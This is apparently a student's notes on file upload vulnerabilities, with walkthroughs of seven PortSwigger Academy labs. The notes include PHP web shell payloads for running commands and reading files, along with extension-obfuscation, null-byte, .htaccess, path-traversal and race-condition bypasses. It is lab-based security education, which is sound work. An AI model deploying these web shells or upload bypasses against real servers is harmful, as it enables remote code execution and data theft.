--------------------------------------------------------------------------------------------
                            # File Upload Vulnerability                                 

# Resources:

>> labs:  
   - https://portswigger.net/web-security/file-upload
   
>> Video:
   - https://www.youtube.com/watch?v=PKO9PzHP4pA&list=PLTSGZiCtCBfMMLkmaN7tGEhbc0QbOEtEA&index=31&pp=iAQB

>> What are file upload vulnerabilities?
   - are when a web server allows users to upload files to its filesystem without sufficiently validating things like their name, type, contents, or size.
   
>> What is the impact of file upload vulnerabilities?
   - Which aspect of the file the website fails to validate properly, whether that be its size, type, contents, and so on.
   - What restrictions are imposed on the file once it has been successfully uploaded.
   
>> Web shell:
   - malicious script that enables an attacker to execute arbitrary commands on a remote web server simply by sending HTTP requests to the right endpoint.
   
>> Command to read arbitrary files from a remote web server:
   - ``` <?php echo file_get_contents('/path/to/target/file'); ?> ```
   
>> Command to execute system commands on a remote web server:
   - ``` <?php echo system($_GET['command']); ?> ```
   - By sending this request ``` GET /example/exploit.php?command=id HTTP/1.1 ```

# Obfuscating file extensions:

- Provide multiple extensions, may be interpreted as either a PHP file or JPG image:
  - ``` exploit.php.jpg ```
  
- Using the URL encoding OR Double URL encoding for (. - / - \):
  - exploit%2Ephp

- Add semicolons or URL-encoded null byte characters before the file extension:
  - ``` exploit.asp;.jpg ```
  - ``` exploit.asp%00.jpg ```

- Stripping the extension:
  - ``` exploit.p.phphp ```
  
- JPEG files always begin with the bytes ``` FF D8 FF ```.

# Lab-1:  Remote code execution via web shell upload:

- Log with (wiener:peter)
- Create a file called "Shell.php" contains the payload
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- Upload it then request the The Avatar location to read this file 
- ``` GET /files/avatars/Shell.php HTTP/2 ```

# Lab-2: Web shell upload via Content-Type restriction bypass:

- Log with (wiener:peter)
- Create a file called "shell.php" contains the payload:
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- Upload it then Intercept the request to change the content type "Validation on it"
- ``` Content-Type: image/png ```
- Now request the Avatar location to read the file:
- ``` GET /files/avatars/shell.php HTTP/2 ```

# Lab-3: Web shell upload via path traversal:

- log with (wiener:peter)
- Create a file called "shell.php" contains the payload:
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- Upload it then request the next url to see the secret key
- ``` GET /files/avatars/shell.php HTTP/2 ```
- Now the file wasn't excuted on the server so you need to change the file of uploading by
- Change the name of the file to ``` ..%2fshell.php ``` to get back one directory
- Intercept the request, In *Content-Disposition* change the *filename*
- Now request the Avatar locatoin to read the file:
- ``` GET /files/avatars/../shell.php HTTP/2 ``` 
- OR ``` GET /files/shell.php HTTP/2 ```

# Lab-4: Web shell upload via extension blacklist bypass:

- Log with (wiener:peter)
- Create a file called "shell.php" contains the payload and upload it:
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- You'll see that the server didn't accept the *.php* extension
- Now change the *filename* to *.htaccess* to edit the configuration file of the server
- Change the *Content-Type:* to *text/plain*
- Add *AddType application/x-httpd-php .l33t* to the body enables excuting *.l33t* extension
- Send the request then
- Change the *filename* to *shell.l33t* 
- Change the *Content-Type:* to *application/x-php*
- Add *<?php echo file_get_contents('/home/carlos/secret'); ?>* as the data of the file
- Send the request then
- Request the Avatar locatoin to read the file:
- ``` GET /files/avatars/shell.l33t HTTP/2 ``` 

# Lab-5: Web shell upload via obfuscated file extension:

- Log with (wiener:peter)
- Create a file called "shell.php" contains the payload and upload it:
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- You'll see that the server didn't accept the *.php* extension
- Change the *filename* to *shell.php%00.jpg* using the Null Byte to escape the validation
- Request the Avatar locatoin to read the file:
- ``` GET /files/avatars/shell.php HTTP/2 ``` 

# Lab-6: Remote code execution via polyglot web shell upload:

- Log with (wiener:peter)
- Upload a real Image and Intercept the request
- Delete some data from *Content-Type* and add the payload on the center of the data
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- Now the Server accept the file and upload it
- Request the Avatar locatoin to read the file:
- ``` GET /files/avatars/shell.php HTTP/2 ``` 
- You'll see the Secret key inside the data of the photo 
- OR you can open the Image in a new file and you'll see the secret key obvous

# Lab-7: Web shell upload via race condition:

- Log with (wiener:peter)
- Create a file called "shell.php" contains the payload and upload it:
- ``` <?php echo file_get_contents('/home/carlos/secret'); ?> ```
- You'll see that the server didn't accept the *.php* extension
- Note the Time taken to render the request "using Sandbox"
- Here the Trick is to send the request of the uploading file
- In the same time send the request of requesting the avatar location 
- To exploit the Race condition Vuln

- OR Use the Burb Extention *TurboIntruder*